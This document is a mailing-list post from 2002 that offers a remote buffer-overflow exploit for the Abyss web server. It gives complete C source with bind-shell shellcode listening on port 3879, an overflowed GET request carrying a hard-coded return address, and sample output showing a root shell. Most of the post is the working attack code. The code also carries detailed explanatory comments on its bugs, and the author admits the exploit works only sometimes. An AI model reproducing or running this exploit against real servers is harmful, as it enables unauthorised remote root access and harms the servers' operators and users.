
 
es_at_hush.com
Date: Fri Nov 29 2002 - 15:22:38 CST


    -----BEGIN PGP SIGNED MESSAGE-----

    Dear List,

    Here is a 0day remote exploit for the Abyss webserver.

    # cat ESAby-not-finished.c
    /*
     * CONFIDENTIAL SOURCE MATERIALS OF THE ElectronicSouls
     * KEEP THIS PRIVATE ! DO NOT LEAVE COPY'S ON UNPROTECTED SYSTEMS !
     *
     * ElectronicSouls ABYSS Remote Exploit
     * (C) BrainStorm - November 2001
     *
     * ABYSS aims to be a fully HTTP/1.1 compliant Web server.
     * Its main design goals are speed, low resource usage and portability.
     * ABYSS works on most UNIX based systems..
     * it seems that the GET and maybe also the HEAD command have exploitable
     * buffer overflows and maybe format strings..
     * this is pre-alpha c0de to further test these bugs.
     * DO NOT DISTRIBUTE THIS FILE !!
     *
     * [usersys ~]$ ./aby2 xxx.xxx.xxx.xxx 80
     * Abyss httpd Exploit by BrainStorm ((ElectronicSouls))
     *
     * - Genetrating overflow packet..
     * - Overflow packet generated.
     * - Connecting ...
     * - transmitting exploit code...
     * Connect to port 3879 on victim host...enjoy ;>
     * [usersys ~]$ telnet xxx.xxx.xxx.xxx 3879
     * Trying xxx.xxx.xxx.xxx...
     * Connected to xxx.xxx.xxx.xxx..
     * Escape character is '^]'.
     * id;
     * uid=0(root) gid=0(root) groups=0(root)
     *
     * Note! for now my status is: sometimes it works sometimes not,
     * more research needs to be done and some more test systems would be nice too..
     */

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ES 157            /* byte budget for the 0x90 padding plus shellcode laid down by overflowed() */

    struct in_addr victim;    /* resolved target address; written by host_to_ip() from main() */
      char overflow[4100];    /* request buffer assembled by overflowed() and sent by env() */

    char shellcode[] = // bind a shell to port 3879
    /* Raw machine-code bytes, opaque to the C compiler; the comment above is the
     * author's only description of what they do and is not verifiable from this
     * listing. overflowed() measures and copies them with strlen()/strcat(),
     * which is only correct while none of the bytes is 0x00. */

    "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
    "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
    "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
    "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
    "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
    "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
    "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
    "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

    /*
     * Build the request that env() later sends, into the global `overflow`:
     *   "GET /", then (ES - strlen(shellcode)) bytes of 0x90, then shellcode,
     *   then `ret` twice. The buffer is zeroed first so the strcat() chain
     *   starts from an empty string.
     *
     * ret  NUL-terminated string supplied by main(); appended twice, unchecked.
     *
     * Declared int but falls off the end without a return statement: reading
     * its result would be undefined behaviour (the caller ignores it).
     * Size check: 5 + ES + 2*strlen(ret) bytes, far below sizeof overflow
     * (4100) for the 4-byte ret that main() passes, so the global is not
     * overrun. ES - strlen(shellcode) is evaluated in size_t: if the shellcode
     * ever grew past ES bytes the subtraction would wrap and the loop would
     * run far past the end of `overflow`.
     */
    int overflowed(char *ret)
    {
        int i;

        memset(overflow, 0, sizeof(overflow));
        strcpy(overflow,"GET /");
        printf("- Genetrating overflow packet..\n");
        /* strlen(shellcode) is re-evaluated on every iteration, and i (int) is
         * compared against a size_t (signed/unsigned comparison). */
        for(i=0;i<(ES-(strlen(shellcode))); i++)
        {
        strcat(overflow,"\x90");
        }
        strcat(overflow, shellcode);
        strcat(overflow, ret);
        strcat(overflow, ret);
        printf("- Overflow packet generated.\n");
    }

    /*
     * Connect to addr on TCP port cport, send the global `overflow` followed by
     * "\n\n", and close the socket. Nothing is read back from the peer.
     *
     * addr   target address, by value (filled in by host_to_ip() in main()).
     * cport  port as a decimal string; atoi() turns anything non-numeric into
     *        port 0 without reporting an error. atoi() and exit() live in
     *        <stdlib.h>, which this file never includes (implicit declaration).
     *
     * Declared int but returns no value, like overflowed().
     * Unchecked calls: socket() may return -1 and is still handed to
     * connect(); both write() results are ignored, so a short or failed write
     * goes unnoticed; a failed connect() exits with status 0 (success).
     */
    int env(struct in_addr addr,char *cport)
    {
        struct sockaddr_in serv;
        int s;

        int port=atoi(cport);

        s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        bzero(&serv,sizeof(serv));   /* legacy BSD call; memset(&serv, 0, sizeof serv) is the portable form */

        memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
        printf("- Connecting ... \n");
        serv.sin_port=htons(port);
        serv.sin_family=AF_INET;

        if (connect(s,(struct sockaddr*)&serv,sizeof(serv)) < 0)
        {
        perror("connect");
        exit(0);
        }
        printf("- transmitting exploit code...\n");
        write(s,overflow,strlen(overflow));   /* return values of both writes are discarded */
        write(s,"\n\n",2);
        close(s);
    }

    /*
     * Resolve hostname with gethostbyname() and copy its first address into
     * *addr. Returns 1 on success, 0 when the lookup fails.
     *
     * The copy uses h_length bytes without checking h_addrtype, so the caller
     * is relying on the resolver returning an IPv4 entry that fits in
     * struct in_addr.
     */
    int host_to_ip(char *hostname,struct in_addr *addr)
    {
        struct hostent *entry = gethostbyname(hostname);

        if (!entry) {
            return 0;
        }

        /* h_addr_list[0] is what the legacy h_addr macro expands to. */
        memcpy(addr, entry->h_addr_list[0], entry->h_length);
        return 1;
    }

    /*
     * Entry point: parse <IP> [port], build the request (overflowed()), resolve
     * the host (host_to_ip()) and send it (env()). Every path ends in exit(0),
     * including the usage and lookup-failure branches, so the process status
     * never signals failure. exit() is used without including <stdlib.h>.
     */
    int main(int argc, char **argv)
    {
        /* ret: 4-byte value appended to the request; serv/port: copies of argv. */
        char ret[8], serv[256], port[8];
        printf("Abyss httpd Exploit by BrainStorm ((ElectronicSouls)) \n\n");

        if(argc<2)
        {
         printf("Usage : %s <IP> [port]\n",argv[0]);
         exit(0);
        }
        if(argc==3)
        {
         /* strncpy() leaves port unterminated when argv[2] is 7+ chars, and the
          * array is never zeroed, so atoi() in env() could read past the copy. */
         strncpy(port, argv[2], 7);
        }
        else
        {
         strcpy(port, "80\0");   /* the explicit \0 is redundant; literals are already terminated */
        }
        strcpy(ret, "\xbf\xff\xf9\x70");   /* hard-coded 4-byte value; no way to override it from the command line */
        /* Same termination issue as port: serv[255] is never written when argv[1]
         * is 255+ chars, handing gethostbyname() an unterminated string. */
        strncpy(serv, argv[1], sizeof(serv)-1);
        overflowed(ret);
        if (!host_to_ip(serv,&victim))
        {
         fprintf(stderr,"Hostname lookup failure\n");
         exit(0);
        }
        env(victim,port);
        printf("Here we go..now connect to port 3879 on victim host and see if it worked...enjoy ;> \n");
        exit(0);
    }

    #

    Thanks to tfish for helping me out with this one.

    The Electronic Souls Crew
    [ElectronicSouls] (c) 2002

    "We copyright our code."
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.2 (Java)
    Note: This signature can be verified at https://www.hushtools.com/verify

    wlMEARECABMFAj3n2rEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltNSEAmgN9D4DaWj6H
    /a6LYyPOk4V81T9sAJ98kPZN3wLRbGArDF7AOrBYZAnlXw==
    =V340
    -----END PGP SIGNATURE-----

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html